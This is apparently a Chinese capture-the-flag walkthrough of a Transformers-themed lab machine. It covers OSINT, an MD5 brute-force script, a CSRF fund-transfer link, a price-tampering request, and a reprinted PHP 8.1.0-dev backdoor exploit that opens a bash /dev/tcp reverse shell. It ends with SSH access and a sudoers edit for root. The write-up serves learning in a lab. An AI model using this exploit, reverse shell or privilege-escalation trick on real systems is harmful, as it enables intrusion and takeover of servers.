毁灭的故事
塞伯坦曾经是独特的自主机器人 Onganism 的所在地。
自从汽车人和霸天虎对塞伯坦的反对以来，已经有数千年的时间了。
它摧毁了地球，使它变得荒凉和死亡。

他们对蓝色星球赞叹不已，继续在宇宙中战斗。
擎天柱，汽车人的领袖，承诺保护人类免受麦加农的邪恶愤怒。
虽然在麻木上有所减弱，但汽车人还是将那些站在毁灭和生活之间的无名之徒安然无恙。

通过 Project iacon，威震天发现了大约 4 个 Omega Keys。
如果在塞伯坦的Omega Lock内使用这些，地球就可以复活。
此外，Omega Lock可以用来改造地球，从而消灭人类......！

你是杰克。 协助汽车人阻止威震天获得所有 4 把钥匙。 你准备好执行任务了吗？！前往秘密汽车人基地！

擎天柱能够找到它们似乎在同一个地方的 2 个密钥的加密坐标。
你（杰克）与大黄蜂和 Arcee 一起被派去获取密钥，然后 Soundwave 能够解密它们！你能找到霸天虎基地来获取 iacon_codes 吗？
（霸天虎出于安全考虑可能会删除 iacon 代码，想办法）坐标的加密消息：daab260727e470e56e77ec22e8f3d413
解密消息的格式：
/iacon_code/国家首都/{纬度_dd.dd-经度_dd.dd}.txt
其中，d是数字0-9/iacon_code/(capital of a country)/{Latitude_dd.dd-Longitude_dd.dd}.txt<!-- The Encrypted Message: daab260727e470e56e77ec22e8f3d413 -->
<!-- @decepticon-base 霸天虎基地 -->

sherlock deception-basehttps://github.com/decepticon-base/Projects

https://web.archive.org/web/20210701042239/https://github.com/decepticon-base/Projects/blob/main/iacon/iacon_codes

# -*- coding: utf-8 -*-
# @Time    : 2022/8/30 9:38 PM
# @Author  : ailx10
# @File    : code.pyimport hashlibf1 = open("iacon_codes","r")
f2 = open("capital","r")codes = f1.readlines()
capitals = f2.readlines()for code in codes:code = code.strip()for capital in capitals:capital = capital.strip()for i in range(10,100):for j in range(10,100):str_1 = "/{}/{}/Latitude_{}.{}-Longitude_{}.{}.txt".format(code,capital,i,j,i,j)str_2 = hashlib.md5(str_1.encode())if str_2.hexdigest() == "daab260727e470e56e77ec22e8f3d413":print(str_1)

/R3LIC-1337/Tokyo/Latitude_95.37-Longitude_95.37.txt恭喜通过第一阶段！您的勇气让我们获得了 4 把钥匙中的 2 把！这是您的第一个标志：Flag1{873b375210b4297e9bdea1ed183c2da5}不过坏消息：/威震天有两把钥匙可供使用。Prime 和 Bumblebee 从叛徒和威震天的前指挥官红蜘蛛那里得到了有关他隐藏在淘汰赛商店最昂贵物品中的秘密物品的信息。
该项目具有管理员凭据。商店链接：/W4RSHIP_Sh0P.php祝你好运！

淘汰赛正在努力完成公式！这可能会改变游戏规则。
红蜘蛛指挥官又出轨了。他被禁止进入这个区域。
除非得到威震天勋爵的命令，否则不要进入存放暗能量的区域。关于
霸天虎杂货店这是你自己的杂货店。 购买energon，预约医生，继续看公告板！
目前，只有管理员可以在账户之间转移 Energon 币。 很快，这将提供给所有人！ 以下是您可以购买的顶级商品。威震天的得力助手。 有钱，兼职叛徒，狡猾而古怪。
只关心他自己和他的画。 不幸的是，他是这里的管理员。
根本不会说话。 太聪明了，不会被欺骗，永远忠于威震天。
我们的管理员会点击任何以 http 或 https 开头的链接，以防您想分享一些甜蜜信息的链接！

将硬币转移给有需要的朋友？
可用余额：0
回到商店
退出您的帐户

我们的管理员会点击任何以 http 或 https 开头的链接，以防您想分享一些甜蜜信息的链接！留言内容如下：
admin_boss
http://192.168.199.210/W4RSHIP_Sh0P_transfer.php?to=ailx10&amount=9999&from=lord_starscream

Purchase Successful!Megatron Login Panel URL: /M3G4TR0N_SUPR3M3/login.php
Username = L0RD_M3G4Tr0N
Password = freakishlylongpasswordforl0gin

# -*- coding: utf-8 -*-
# @Time    : 2022/8/30 11:19 PM
# @Author  : ailx10
# @File    : post.pyimport requestsurl = "http://192.168.199.210/W4RSHIP_Sh0P_buy.php"
data= { "itemid": 2, "price": 9999.00 }
cookies = {"PHPSESSID":"kl90bbdk93qni24gpld6pnc3ls"}
r = requests.post(url=url,data=data,cookies=cookies)print(r.text)

# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
  python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""#!/usr/bin/env python3
import os, sys, argparse, requestsrequest = requests.Session()def check_target(args):cookies = {"PHPSESSID":"kl90bbdk93qni24gpld6pnc3ls"}response = request.get(args.url,cookies=cookies)for header in response.headers.items():if "PHP/8.1.0-dev" in header[1]:return Truereturn Falsedef reverse_shell(args):payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)def main(): parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")parser.add_argument("url", metavar='<target URL>', help="Target URL")parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")args = parser.parse_args()if check_target(args):reverse_shell(args)else:print("Host is not available or vulnerable, aborting...")exitif __name__ == "__main__":main()

mv identity ssh_key.pem
chmod 600 ssh_key.pem
ssh -i ssh_key.pem soundwave@192.168.199.210

/usr/bin/vim /var/Decepticon/*

#soundwave ALL= NOPASSWD: /usr/bin/vim  /var/Decepticon/*soundwave ALL=(ALL) NOPASSWD:ALL